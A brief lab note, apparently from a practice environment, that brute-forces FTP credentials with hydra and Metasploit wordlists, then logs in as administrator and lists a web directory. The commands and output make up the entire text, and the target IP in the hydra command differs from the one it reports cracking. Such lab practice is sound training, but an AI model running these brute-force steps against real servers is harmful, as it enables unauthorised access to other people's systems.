FTP Exploitation

FTP Brute Force

hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.0.22.85 ftp
[21][ftp] host: 10.0.28.97   login: administrator   password: vagrant

Connect via FTP with discovered credentials:

ftp 10.0.28.97 21
root@attackdefense:~/Desktop/Win2k8# ftp 10.0.28.97 21
Connected to 10.0.28.97.
220 Microsoft FTP Service
Name (10.0.28.97:root): administrator
331 Password required for administrator.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49380|)
125 Data connection already open; Transfer starting.
10-28-21  06:22AM       <DIR>          aspnet_client
10-28-21  06:19AM                  28  caidao.asp
10-28-21  06:18AM               34251  hahaha.jpg
10-28-21  06:18AM             1116928  index.html
10-28-21  06:18AM             2439511  seven_of_hearts.html
10-28-21  06:18AM              384916  six_of_diamonds.zip
10-28-21  06:22AM              184946  welcome.png
226 Transfer complete.
ftp>
Powered by Forestry.md